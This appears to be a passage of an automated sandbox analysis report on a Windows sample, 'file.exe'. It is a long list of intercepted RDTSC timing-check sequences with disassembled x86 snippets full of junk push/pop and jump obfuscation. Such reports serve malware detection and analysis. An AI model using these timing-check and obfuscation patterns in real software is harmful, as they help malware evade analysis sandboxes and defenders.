                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A19E1 second address: 7A19E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A19E5 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE839054481h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91065F second address: 910686 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A38Dh 0x00000007 jmp 00007FE83906A392h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910686 second address: 91068C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91098D second address: 910993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910993 second address: 910997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910997 second address: 9109AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE83906A391h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9109AE second address: 9109B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9109B7 second address: 9109C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE83906A386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910B11 second address: 910B2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054489h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910B2E second address: 910B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910B34 second address: 910B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910B3E second address: 910B61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jnl 00007FE83906A386h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910CAE second address: 910CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910CB5 second address: 910CC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FE83906A386h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910CC1 second address: 910CD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE839054484h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91438C second address: 9143CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push esi 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f pop esi 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jp 00007FE83906A392h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jno 00007FE83906A386h 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jbe 00007FE83906A38Ch 0x00000030 js 00007FE83906A386h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9143CE second address: 9143D3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9143D3 second address: 7A19FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov dword ptr [ebp+122D2544h], esi 0x0000000e je 00007FE83906A38Ch 0x00000014 mov esi, dword ptr [ebp+122D2AAFh] 0x0000001a push dword ptr [ebp+122D0D8Dh] 0x00000020 mov dword ptr [ebp+122D2344h], eax 0x00000026 call dword ptr [ebp+122D1F76h] 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D2373h], esi 0x00000033 xor eax, eax 0x00000035 cmc 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a js 00007FE83906A38Ch 0x00000040 xor dword ptr [ebp+122D2594h], eax 0x00000046 add dword ptr [ebp+122D2594h], ecx 0x0000004c mov dword ptr [ebp+122D2CC7h], eax 0x00000052 jmp 00007FE83906A38Fh 0x00000057 add dword ptr [ebp+122D2594h], eax 0x0000005d mov esi, 0000003Ch 0x00000062 mov dword ptr [ebp+122D354Ah], ecx 0x00000068 pushad 0x00000069 add bh, 00000056h 0x0000006c jmp 00007FE83906A392h 0x00000071 popad 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D354Ah], esi 0x0000007c lodsw 0x0000007e jmp 00007FE83906A396h 0x00000083 add eax, dword ptr [esp+24h] 0x00000087 stc 0x00000088 jmp 00007FE83906A38Ch 0x0000008d mov ebx, dword ptr [esp+24h] 0x00000091 sub dword ptr [ebp+122D2373h], edi 0x00000097 nop 0x00000098 jl 00007FE83906A394h 0x0000009e push eax 0x0000009f push eax 0x000000a0 push edx 0x000000a1 jmp 00007FE83906A391h 0x000000a6 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914464 second address: 914468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914468 second address: 9144F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FE83906A38Ch 0x0000000c popad 0x0000000d add dword ptr [esp], 5B68C300h 0x00000014 xor ch, 0000004Eh 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D2544h], edi 0x0000001f push 00000000h 0x00000021 jmp 00007FE83906A38Bh 0x00000026 push 00000003h 0x00000028 pushad 0x00000029 mov dx, ax 0x0000002c mov esi, 745B9ED4h 0x00000031 popad 0x00000032 push B7A096EEh 0x00000037 push esi 0x00000038 jo 00007FE83906A388h 0x0000003e pushad 0x0000003f popad 0x00000040 pop esi 0x00000041 xor dword ptr [esp], 77A096EEh 0x00000048 lea ebx, dword ptr [ebp+124462C0h] 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FE83906A388h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 mov dx, bx 0x0000006b xchg eax, ebx 0x0000006c js 00007FE83906A392h 0x00000072 jc 00007FE83906A38Ch 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914578 second address: 91457C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91457C second address: 914609 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE83906A393h 0x0000000f popad 0x00000010 add dword ptr [esp], 405EAED8h 0x00000017 mov dword ptr [ebp+122D232Ch], ebx 0x0000001d push 00000003h 0x0000001f mov dh, 03h 0x00000021 push 00000000h 0x00000023 sub dword ptr [ebp+122D1C0Eh], edx 0x00000029 push 00000003h 0x0000002b jmp 00007FE83906A38Ah 0x00000030 push 92D4FCA1h 0x00000035 jmp 00007FE83906A399h 0x0000003a xor dword ptr [esp], 52D4FCA1h 0x00000041 movsx edx, cx 0x00000044 lea ebx, dword ptr [ebp+124462C9h] 0x0000004a jmp 00007FE83906A395h 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 push ecx 0x00000054 pop ecx 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914609 second address: 91460F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91460F second address: 914624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007FE83906A388h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91469C second address: 9146E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FE839054478h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 movsx esi, cx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D29C7h] 0x00000030 xor dx, 8BB3h 0x00000035 push FC622B28h 0x0000003a push edx 0x0000003b pushad 0x0000003c push esi 0x0000003d pop esi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9146E2 second address: 914747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 add dword ptr [esp], 039DD558h 0x0000000d and esi, dword ptr [ebp+122D1F2Fh] 0x00000013 push 00000003h 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D2311h], ebx 0x0000001c mov dword ptr [ebp+122D1CECh], esi 0x00000022 popad 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007FE83906A388h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000018h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov dword ptr [ebp+122D3337h], esi 0x00000045 push 00000003h 0x00000047 jns 00007FE83906A38Ah 0x0000004d call 00007FE83906A389h 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914747 second address: 91474B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91474B second address: 91474F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91474F second address: 914765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE83905447Ch 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914765 second address: 91476C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91476C second address: 914797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FE83905448Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914797 second address: 9147DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE83906A395h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FE83906A392h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007FE83906A38Eh 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9147DC second address: 914831 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE839054478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FE839054478h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dx, 9E87h 0x00000029 jnl 00007FE83905447Ch 0x0000002f lea ebx, dword ptr [ebp+124462D4h] 0x00000035 or dword ptr [ebp+122D1DBCh], eax 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 914831 second address: 914836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926719 second address: 926722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933558 second address: 933579 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE83906A394h 0x00000008 jmp 00007FE83906A38Ch 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jc 00007FE83906A38Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933579 second address: 933587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007FE839054476h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9336FE second address: 933702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933702 second address: 933725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FE83905447Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE83905447Fh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933725 second address: 933729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9339E6 second address: 9339F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933D22 second address: 933D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FE83906A386h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933D2C second address: 933D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83905447Bh 0x00000007 jmp 00007FE839054486h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FE839054487h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9342E8 second address: 93431B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jc 00007FE83906A386h 0x0000000b jno 00007FE83906A386h 0x00000011 jmp 00007FE83906A392h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b pop edx 0x0000001c pop eax 0x0000001d ja 00007FE83906A396h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93431B second address: 934323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93447F second address: 9344A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A398h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE83906A38Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934608 second address: 934612 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE839054476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BF7F second address: 92BF99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A390h 0x00000007 je 00007FE83906A392h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934D53 second address: 934D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934D59 second address: 934D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 934EB2 second address: 934ED5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jl 00007FE8390544A4h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FE839054476h 0x00000015 jmp 00007FE83905447Eh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93506E second address: 93507A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FE83906A386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9354D9 second address: 9354E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9354E7 second address: 9354EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9354EB second address: 9354FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83905447Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939BB3 second address: 939BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE83906A386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939BBF second address: 939BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939BC7 second address: 939BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE83906A392h 0x00000009 jmp 00007FE83906A38Ch 0x0000000e jmp 00007FE83906A390h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939BFA second address: 939C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939C02 second address: 939C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939C06 second address: 939C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE839054489h 0x0000000d jmp 00007FE83905447Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939C35 second address: 939C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE83906A398h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FE83906A386h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939C5E second address: 939C79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FE83905447Dh 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939C79 second address: 939C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BE3B second address: 93BE40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D709 second address: 93D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D718 second address: 93D76E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE839054478h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edx 0x0000000f push esi 0x00000010 jmp 00007FE839054484h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jmp 00007FE83905447Bh 0x0000001f jmp 00007FE839054486h 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push edi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D76E second address: 93D772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94155D second address: 941561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900387 second address: 90038D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90038D second address: 900391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900391 second address: 900397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 900397 second address: 9003A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE839054476h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9003A1 second address: 9003A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940E94 second address: 940EAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e jc 00007FE83905447Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94124D second address: 94125A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE83906A386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94125A second address: 941261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9413AA second address: 9413B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
